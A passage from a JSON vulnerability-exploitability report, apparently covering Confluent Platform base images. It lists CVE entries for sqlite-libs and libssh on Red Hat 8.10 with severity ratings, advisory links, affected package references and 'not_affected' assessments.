          "url": "https://gist.github.com/cnwangjihe/f496393f30f5ecec5b18c8f5ab072054"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70873"
        },
        {
          "url": "https://sqlite.org/forum/forumpost/761eac3c82"
        },
        {
          "url": "https://sqlite.org/src/info/3d459f1fb1bd1b5e"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-70873"
        }
      ],
      "published": "2026-03-12T19:16:15+00:00",
      "updated": "2026-06-17T10:03:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-8114",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libssh, a library that implements the SSH protocol. When calculating the session ID during the key exchange (KEX) process, an allocation failure in cryptographic functions may lead to a NULL pointer dereference. This issue can cause the client or server to crash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-8114"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-8114"
        },
        {
          "url": "https://bugzilla.redhat.com/2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-18683.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://git.libssh.org/projects/libssh.git/commit/?id=53ac23ded4cb2c5463f6c4cd1525331bd578812d"
        },
        {
          "url": "https://git.libssh.org/projects/libssh.git/commit/?id=65f363c9"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-8114.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8114"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7849-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-8114"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2025-8114.txt"
        }
      ],
      "published": "2025-07-24T15:15:27+00:00",
      "updated": "2026-06-30T02:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-8277",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401
      ],
      "description": "A flaw was found in libssh's handling of key exchange (KEX) processes when a client repeatedly sends incorrect KEX guesses. The library fails to free memory during these rekey operations, which can gradually exhaust system memory. This issue can lead to crashes on the client side, particularly when using libgcrypt, which impacts application stability and availability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-8277"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-8277"
        },
        {
          "url": "https://bugzilla.redhat.com/2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-18683.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-8277.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8277"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-8277"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2025-8277.txt"
        }
      ],
      "published": "2025-09-09T12:15:30+00:00",
      "updated": "2026-06-30T09:16:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
